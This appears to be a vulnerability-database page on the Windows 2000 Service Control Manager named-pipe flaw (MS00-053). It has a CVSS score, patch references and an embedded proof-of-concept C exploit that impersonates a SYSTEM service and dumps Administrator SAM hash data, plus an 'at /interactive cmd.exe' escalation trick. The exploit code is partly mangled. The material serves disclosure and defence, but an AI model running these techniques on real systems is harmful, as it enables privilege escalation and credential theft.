发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:45

[原文]The Service Control Manager (SCM) in Windows 2000 creates predictable named pipes, which allows a local user with console access to gain administrator privileges, aka the "Service Control Manager Named Pipe Impersonation" vulnerability.

[CNNVD]Microsoft Windows 2000可预测命名管道漏洞(MS00-053)(CNNVD-200010-116)

        Microsoft Windows是微软发布的非常流行的操作系统。
        服务控制管理器(services.exe)是Windows 2000提供的管理工具,允许创建或修改系统服务。SCM会在每个服务开始的时候创建命名管道。但是,如果恶意程序能够在服务启动前预测并创建特定服务的命名管道的话,就可以扮演该服务的权限。这可能允许攻击者以特定用户或本地系统权限运行恶意程序。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Microsoft Windows 2000可预测命名管道漏洞(MS00-053)
中危 未知
2000-10-20 00:00:00 2005-10-12 00:00:00
        Microsoft Windows是微软发布的非常流行的操作系统。
        服务控制管理器(services.exe)是Windows 2000提供的管理工具,允许创建或修改系统服务。SCM会在每个服务开始的时候创建命名管道。但是,如果恶意程序能够在服务启动前预测并创建特定服务的命名管道的话,就可以扮演该服务的权限。这可能允许攻击者以特定用户或本地系统权限运行恶意程序。

- 公告与补丁

        MS00-053:Patch Available for "Service Control Manager Named Pipe Impersonation" Vulnerability


- 漏洞信息 (20133)

Microsoft Windows 2000 Named Pipes Predictability Vulnerability (EDBID:20133)
windows local
2000-08-01 Verified
0 Maceo
N/A [点击下载]

The Service Control Manager (SCM) is an administrative tool in Windows 2000 which handles the creation and modification of system services such as Server, Workstation, Alerter, and ClipBook. A server-side named pipe is created before each service is started and are named in a predictable sequence which can be obtained from:


Due to the predictability of subsequent named pipes, any local user logged on interactively to a Windows 2000 machine is able create a server-side named pipe and assume the security context of the system service the next time it is started. Arbitrary code could be attached to the named pipe, making it possible for the local user to craft an exploit that would allow them to gain Administrator account status.

 *  Proof of Concept
 *  Windows2000 services named pipe vulnerability
 *  Author:  Maceo
 *  Compiled with MS VC++ 6.0 SP3
 *  Compiled and tested on:
 *     D:\>uname -sv
 *     Windows2000 5.0.2195
 *  Vulnerability:  Windows 2000 uses predictable named
 *  pipe names for controlling services.  Any user process
 *  can create a named pipe with the next name and force
 *  a service, they can start, to connect to the pipe.  Once
 *  connected the user process can impersonate the service,
 *  which in most cases runs in the SYSTEM account.
 *  Proof of concept:  This code abuses the clipbook service
 *  to run as the SYSTEM account and then dumps information
 *  from the local SAM database.  
 *  This file is for educational purposes only.  As many
 *  would agree, the default install of a W2K server is 
 *  inherently insecure against interactive users.  One
 *  does not have to dig very hard to find a way to 
 *  elevate a users privileges when placed in an interactive
 *  situation, such as logged in at a console.  For instance:
 *     D:\>time
 *     The current time is: 23:28:38.42
 *     D:\>at 23:29 /interactive cmd.exe
 *  It is with this in mind I release the following code.
 *  Disclaimer: This file is intended as proof of concept, and
 *  is not intended to be used for illegal purposes. The author
 *  does not accept responsibility for ANY damage incurred 
 *  by the use of it.

#include <stdio.h>
#include <windows.h>

#define ABUSE_SVC "clipbook"
#define SVC_KEY "SYSTEM\\CurrentControlSet\\Control\\ServiceCurrent"
#define SAM_KEY "SAM\\SAM\\Domains\\Account\\Users\\000001F4"

int main( )
  HKEY hOpen;
  DWORD dwNumber = 0;
  DWORD dwType = REG_DWORD;  
  DWORD dwSize = sizeof(DWORD);
  char szNetCmd[256];

  // make sure the service we want to abuse is stopped. //
  sprintf (szNetCmd, "net stop %s", ABUSE_SVC);
  system (szNetCmd);

  // open the current service number key //
  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SVC_KEY, 0, KEY_READ, &hOpen))
    printf ("Failed to open key:\n  %s\n", SVC_KEY);
    return 1;
  // read the key //
  if (RegQueryValueEx (hOpen, "", NULL, &dwType, (BYTE *) &dwNumber, &dwSize))
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\n", SVC_KEY);
    return 2;
  // close the key //
  RegCloseKey (hOpen);

  // build the next named pipe name //
  char szPipe[64];
  sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", ++dwNumber);
  // create the named pipe before scm can // 
  HANDLE hPipe = 0;
  hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
                           2, 0, 0, 0, NULL);
    printf ("Failed to create named pipe:\n  %s\n", szPipe);
    return 3;

  // start the service we are going to abuse. //
  sprintf(szNetCmd, "start /min net start %s", ABUSE_SVC);
  // wait for the service to connect // 
  ConnectNamedPipe (hPipe, NULL);

  // read a byte of data from the client //
  if (!ReadFile (hPipe, (void *) &dwNumber, 4, &dwSize, NULL))
    printf ("Failed to read the named pipe.\n");
    return 4;

  // assume the identity of the client //
  if (!ImpersonateNamedPipeClient (hPipe))
    printf ("Failed to impersonate the named pipe.\n");
    return 5;

  // display impersonating users name //
  dwSize  = 256;
  char szUser[256];
  GetUserName(szUser, &dwSize);
  printf ("Impersonating: %s\n", szUser);

  // Assume we are SYSTEM since it is the default, 
  // and let's crack open the SAM database and 
  // lookup rid 500 (Administrator unless name has been changed)
  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SAM_KEY, 0, KEY_READ, &hOpen))
    printf ("Failed to open key:\n  %s\n", SAM_KEY);
    return 1;

  // read the F key //
  dwSize = 2048;
  BYTE szData[2048];
  if (RegQueryValueEx (hOpen, "F", NULL, &dwType, szData, &dwSize))
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\\F\n", SAM_KEY);
    return 2;

  // output the key //
  printf ("Dumping SAM for RID 500 ...\n\n");
  printf ("F:0x");
  for (DWORD i = 0; i < dwSize; i++) 
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("\n\n"); 

  // read the V key //
  dwSize = 2048;
  if (RegQueryValueEx (hOpen, "V", NULL, &dwType, szData, &dwSize))
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\\V\n", SAM_KEY);
    return 2;

  // output the key //
  printf ("V:0x");
  for (i = 0; i < dwSize; i++) 
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("\n"); 

  // clean up //
  RegCloseKey (hOpen);
  return 0;

- 漏洞信息

Windows 2000 Service Control Manager Named Pipe Impersonation
Local Access Required Race Condition
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

Windows 2000 contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the Service Control Manager starts services with predictable Named Pipes, which an attacker can use to execute commands as LocalSystem. This flaw may lead to a loss of integrity.

- 时间线

2000-08-02 Unknow
2000-08-05 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者